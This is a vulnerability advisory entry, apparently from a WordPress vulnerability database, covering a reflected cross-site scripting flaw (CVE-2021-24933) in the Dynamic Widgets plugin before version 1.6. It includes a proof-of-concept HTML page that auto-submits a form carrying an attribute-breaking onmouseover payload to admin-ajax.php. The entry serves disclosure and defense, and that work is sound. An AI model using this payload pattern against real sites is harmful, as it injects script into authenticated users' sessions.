WordPress Plugin Vulnerabilities

Dynamic Widgets < 1.6 - Reflected Cross-Site Scripting

Description

The plugin does not escape the prefix parameter before outputting it back in an attribute when using the term_tree AJAX action (available to any authenticated users), leading to a Reflected Cross-Site Scripting issue

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
      <input type="hidden" name="action" value="term_tree" />
      <input type="hidden" name="prefix" value='xxxxxx" onmouseover=alert(/XSS/) test="' />
      <input type="hidden" name="name" value="Uncategorizedory" />
      <input type="hidden" name="widget_id" value="1" />
      <input type="hidden" name="id" value="2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>

  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>

Affects Plugins

Plugin icon
dynamic-widgets
Fixed in 1.6

References

CVE
CVE-2021-24933

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
ZhongFu Su(JrXnm) of Wuhan University
Submitter
ZhongFu Su(JrXnm) of Wuhan University
Submitter website
https://blog.szfszf.top/
Submitter twitter
JrXnm
Verified
Yes
WPVDB ID
b8e6f0d3-a7d1-4ca8-aba8-0d5075167d55

Timeline

Publicly Published
2021-12-28 (about 2 years ago)
Added
2022-01-26 (about 2 years ago)
Last Updated
2023-09-25 (about 7 months ago)

Other

Published
Title
Published
2022-02-17
Title
Profile Builder < 3.6.2 - Reflected Cross-Site Scripting
Published
2016-05-06
Title
WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
Published
2014-08-01
Title
Wordpress 1.5.1 - 2.0.2 wp-register.php Multiple Parameter XSS
Published
2023-11-07
Title
ANAC XML Bandi di Gara <= 7.5 - Authenticated (Editor+) Stored Cross-Site Scripting
Published
2023-11-29
Title
WP Pocket URLs <= 1.0.2 - Reflected Cross-Site Scripting